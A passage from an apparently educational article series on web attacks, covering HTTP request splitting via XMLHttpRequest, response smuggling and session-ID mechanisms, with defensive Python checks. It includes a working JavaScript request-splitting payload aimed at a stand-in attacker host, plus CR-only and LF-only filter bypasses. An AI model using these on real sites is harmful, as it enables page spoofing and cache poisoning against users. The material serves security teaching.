Note: XMLHttpRequest is a JavaScript object that allows client-side JavaScript code to send almost raw HTTP requests to the origin host, and to access the response body in raw form. As such, XMLHttpRequest is a core component of AJAX.
Attack scenario
Consider a web application that has an XSS vulnerability, with a web proxy between the victim and the web server. Exploiting the XMLHttpRequest object, the attacker fools the victim into triggering the following malicious script:
var x = new ActiveXObject("Microsoft.XMLHTTP");
//var x = new XMLHttpRequest();
// The "method" argument carries a complete first request, followed by the start of a second one.
x.open("GET\thttp://www.attacker.com/page1.html\tHTTP/1.0\r\nHost:\twww.attacker.com\r\nProxy-Connection:\tKeep-Alive\r\n\r\nGET","http://www.attacker.com/page2.html",false);
x.send();
//x.send("");
window.open("http://www.example.com/index.html");
Note: The above code will work in Internet Explorer; the modifications required for Mozilla are commented out, so you can just uncomment them as required.
When the victim’s browser executes the above script, it sends a single HTTP request, whose target is www.attacker.com. Thus, it does not break the same-origin policy, and hence is allowed. However, the forward proxy server will receive the following request:
GET\thttp://www.attacker.com/page1.html\tHTTP/1.0
Host:\twww.attacker.com
Proxy-Connection:\tKeep-Alive
GET http://www.attacker.com/page2.html HTTP/1.0
Host: www.attacker.com
……
……
Content-Type: text/html
Connection: Keep-Alive
Hence, it will respond with two HTTP responses. The first response (http://www.attacker.com/page1.html) will be consumed by the XHR object itself, and the second (http://www.attacker.com/page2.html) will wait in the browser’s response queue until the browser requests http://www.example.com/index.html (because window.open() will now execute). Now, the browser will match the response from http://www.attacker.com/page2.html to the request for the URL http://www.example.com/index.html, and will display the attacker’s page in the window, with that URL.
Important note: In the above attack, we have used horizontal tabs (\t) instead of simple spaces, because IE doesn’t allow spaces in the method parameter of x.open(). The reason we have used HTTP/1.0 is that HTTP/1.1 strictly requires a space as the separator, while HTTP/1.0 has no such restriction.
The malicious script executed by the victim’s browser sends only one request, but the proxy receives two HTTP requests (potentially to different origin domains), hence the proxy responds with two different HTTP responses.
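To see why the proxy counts two requests, the following Python sketch assembles the request the way a client that does not validate the method argument might, and then splits the result at blank lines. The build_request and is_valid_method helpers are hypothetical; the token pattern reflects the HTTP grammar for method names, which allows neither whitespace nor CR/LF.

```python
import re

# The "method" string from the script above (tabs instead of spaces).
injected_method = (
    "GET\thttp://www.attacker.com/page1.html\tHTTP/1.0\r\n"
    "Host:\twww.attacker.com\r\n"
    "Proxy-Connection:\tKeep-Alive\r\n"
    "\r\n"
    "GET"
)
url = "http://www.attacker.com/page2.html"


def build_request(method, target):
    """Naively concatenate method, URL and version, without validation."""
    return f"{method} {target} HTTP/1.0\r\nHost: www.attacker.com\r\n\r\n"


wire = build_request(injected_method, url)

# Each blank line ends one request; collect the first line of every request.
request_lines = [
    block.split("\r\n")[0] for block in wire.split("\r\n\r\n") if block
]
for line in request_lines:
    print(repr(line))

# A method name must be a plain HTTP token: no tabs, spaces, CR or LF.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def is_valid_method(method):
    return TOKEN.fullmatch(method) is not None


print(is_valid_method(injected_method), is_valid_method("GET"))
```

A client or proxy that applied a check like is_valid_method before building the request would refuse the injected string, since it contains tabs and CRLFs.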
Time for security
Though HTTP request splitting is a very rare attack, the following recommendations should still be carried out:
It is good if site owners use SSL for protection.
Eliminating XSS entirely will definitely help a lot.
Some also suggest blocking HTTP/1.0 requests to the web server. This will work, but it will also block the web crawlers and spiders of major search engines, because those mostly use HTTP/1.0.
Follow the security tips given for the previous attacks (especially parsing all the user input for CRLFs).
HTTP response smuggling attack
This is a very rarely occurring attack, in which an attacker smuggles two HTTP responses from a server to a client, through an intermediary HTTP device that allows a single response from the server. To do this, it takes advantage of inconsistent or incorrect interpretations of the HTTP protocol by various applications. For example, it might use different block-terminating characters (CR or LF alone), add duplicate header fields that browsers interpret as belonging to separate responses, or use other techniques. Consequences of this attack can include response splitting, cross-site scripting, apparent defacement of targeted sites, cache poisoning, or similar actions.
The main use of this attack is in evading anti-HTTP-response-splitting (anti-HRS) mechanisms; for this to happen, the targeted server must allow the attacker to insert content that will appear in the server’s response. HTTP response smuggling makes use of HTTP request smuggling-like techniques to exploit the discrepancies between what an anti-HRS mechanism (or a proxy server) would consider to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti-HRS mechanism may consider a particular response stream harmless (a single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP-response-splitting technique (in the first use case), or be susceptible to page spoofing (in the second case).
For example, some anti-HRS mechanisms in use by some application engines forbid the application from inserting a header containing CR+LF to the response. Yet, an attacker can force the application to insert a header containing LFs only, or CRs only, thereby circumventing the defence mechanism. Some proxy servers may still treat CR (only) as a header (and response) separator, and as such, the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy’s cache.
Since this attack has many more dependencies (which is the reason for its rarity), please visit the resources below to get a good grasp of it. As for security measures, interpret HTTP messages strictly wherever possible. (Remember: no CRs and no LFs.) Moreover, encoding header information that comes from user input (so that user-supplied content is not interpreted by intermediaries) is also a good way to handle the attack. Finally, reject any non-RFC-compliant response.
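The CR-only or LF-only bypass and the two counter-measures mentioned above can be sketched in Python as follows. Everything here is illustrative: the filter functions, the lenient parser and the payload are hypothetical, and do not describe any specific application engine or proxy.

```python
import re
from urllib.parse import quote


def naive_filter_allows(value):
    """Mimic an anti-splitting check that only looks for the CR+LF pair."""
    return "\r\n" not in value


def strict_filter_allows(value):
    """Reject any CR or LF, whether paired or alone."""
    return "\r" not in value and "\n" not in value


def lenient_lines(stream):
    """Mimic a forgiving parser that accepts CR+LF, CR or LF as a line end."""
    return re.split(r"\r\n|\r|\n", stream)


# Hypothetical user input destined for a response header; it uses LF only.
payload = "en\nSet-Cookie: injected=1"
header = "Content-Language: " + payload

print(naive_filter_allows(payload))   # the LF-only payload slips through
print(lenient_lines(header))          # a lenient parser sees two header lines
print(strict_filter_allows(payload))  # the strict check refuses it

# Alternatively, encode the user-supplied value so that no raw CR or LF
# ever reaches the response stream.
encoded = quote(payload)
print(encoded)
```

The strict check and the encoding step are alternatives; either one keeps user-supplied CRs and LFs out of the header section.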
All the examples and attack scenarios explained above are just for educational purposes. I once again stress that neither I nor LFY aim to teach readers how to attack servers. Rather, the attack techniques are meant to give you knowledge that you need to protect your own infrastructure. We will deal with other dangerous attacks on web applications and Apache in the next article. Always remember: Know hacking, but no hacking.
In this part of the series, we are going to concentrate on attacks on session management. Application-level attacks on a session are about obtaining or manipulating the session ID without the knowledge of the client or the Web server. The sole aim of the attacker here is to somehow gain access to a valid session between the victim and the Web server.
Before explaining the principles behind attacks on sessions, let’s have a look at exactly what a session is, and why we need it.
HTTP is a stateless protocol. Every time the client asks for a page, or for a graphic within a page, a new connection is set up between the client’s browser and the Web server. There is no relationship at all between one connection and another, because there is no state. The second connection does not know anything about what took place during the first connection.
Though this statelessness of HTTP is perfectly acceptable in some cases (for example, when using the Web to search for information), it is not appropriate for a Web application where context needs to be maintained from page to page. For example, on an e-commerce site, on the page where users enter their credit card number to complete the purchase transaction, the code needs to know what items they have chosen on the previous pages, in order to compute the total amount. The e-commerce site needs a mechanism that identifies a “session”, a virtual “established connection” between a browser and a Web server, to pass a context from page to page.
Figure 1: Normal client-server communication using session ID
Technically, this is done as shown in Figure 1. When the browser connects to the Web server for the first time, the user has not been authenticated yet. The Web server asks for credentials, and generates a unique identifier (the session ID). The server can associate a context with each session ID, storing any kind of information in that context. The generated session ID is sent back to the browser. For every subsequent call to the server, the browser sends the session ID to the server. The server can then use the context associated with the transmitted session ID, and “remember” data from page to page.
It is important to understand here that to identify a session, the session is given a session ID. This ID is sent between client and server for those HTTP requests that belong to that session. The Web application sessions are usually implemented in two ways:
Client-side session management: In client-side session implementation, the bulk of authorisation and identity information for the user is stored client-side, in a cookie. The client sends the information found in its cookie (including the session ID) to let the server know who is sending these requests.
Server-side session management: In contrast, the server-side implementation stores the bulk of authorisation and identity information in a back-end database on the server. The session ID is used to index the user’s information in that database, so the server can access the appropriate information upon receiving requests from the client.
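A minimal Python sketch of the server-side approach is shown below. It assumes an in-memory dictionary in place of the back-end database, and the SessionStore class and its method names are hypothetical. The session ID comes from Python's secrets module, so that it is hard to guess.

```python
import secrets


class SessionStore:
    """Keeps each session's context on the server, indexed by session ID."""

    def __init__(self):
        self._contexts = {}  # stands in for the back-end database

    def create(self, username):
        """Create a context after login and return the new session ID."""
        session_id = secrets.token_urlsafe(32)  # random, unguessable ID
        self._contexts[session_id] = {"user": username, "cart": []}
        return session_id

    def context(self, session_id):
        """Return the stored context, or None for an unknown session ID."""
        return self._contexts.get(session_id)

    def destroy(self, session_id):
        """Forget the session, for example at logout."""
        self._contexts.pop(session_id, None)


store = SessionStore()
sid = store.create("alice")

# On a later request, the browser sends back only the session ID;
# the server looks up the context and "remembers" the cart.
store.context(sid)["cart"].append("book")
print(store.context(sid))

store.destroy(sid)
print(store.context(sid))
```

Only the identifier travels between browser and server; the authorisation and identity data stay on the server side.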
Session identifier mechanisms
To identify and maintain valid sessions, the following three mechanisms are used:
Unique identifier embedded in URL.
Unique identifier in hidden form field.
Unique identifier in cookies.
We will now discuss each one of them, and their advantages and disadvantages.
Embedded in the URL
Such identifiers are received by the Web application through HTTP GET requests when the client clicks on a link embedded in a page. For example: http://www.bank.com/account.php?sessionid=IE60012219.
Web-based invitation services, for instance, typically use unique session IDs embedded in URLs.
Advantages:
This method is immune to CSRF attacks that are leveraged through external websites.
This method is also independent of browser settings. Passing parameters along with URLs is a feature that is always supported by all browsers. This is one of the reasons why URL parameters are a fall-back solution to cookies.
Disadvantages:
The session ID in the URL is visible. It appears in the HTTP Referer header sent to other websites when the client follows an external link from within the application. Moreover, it also appears in the log files of proxy and Web servers, as well as in the browser history and bookmarks.
There is also a risk of clients copying the URL (including the identifier), and mailing it to others, while they are still logged in.
Every link within the Web application must include the session ID; either the application itself or the application’s framework must take care of this.
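The link-rewriting burden, and one way to limit the leakage described above, can be sketched with Python's urllib.parse module. The helper names are hypothetical, and the parameter name sessionid is taken from the example URL; a real framework would normally do this for you.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def _other_params(query, param):
    """Return the query pairs, leaving out any existing session parameter."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if k != param]


def with_session_id(url, session_id, param="sessionid"):
    """Rewrite an internal link so that it carries the session ID."""
    parts = urlsplit(url)
    query = _other_params(parts.query, param) + [(param, session_id)]
    return urlunsplit(parts._replace(query=urlencode(query)))


def without_session_id(url, param="sessionid"):
    """Strip the session ID, e.g. before writing a URL to a log file."""
    parts = urlsplit(url)
    query = _other_params(parts.query, param)
    return urlunsplit(parts._replace(query=urlencode(query)))


link = with_session_id("http://www.bank.com/account.php", "IE60012219")
print(link)
print(without_session_id(link))
```

Every internal link has to pass through something like with_session_id, while anything that leaves the application (logs, external links) should pass through something like without_session_id first.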
In hidden form fields
Typically, session ID information is embedded within the form as a hidden field, and submitted with the HTTP POST command. For example: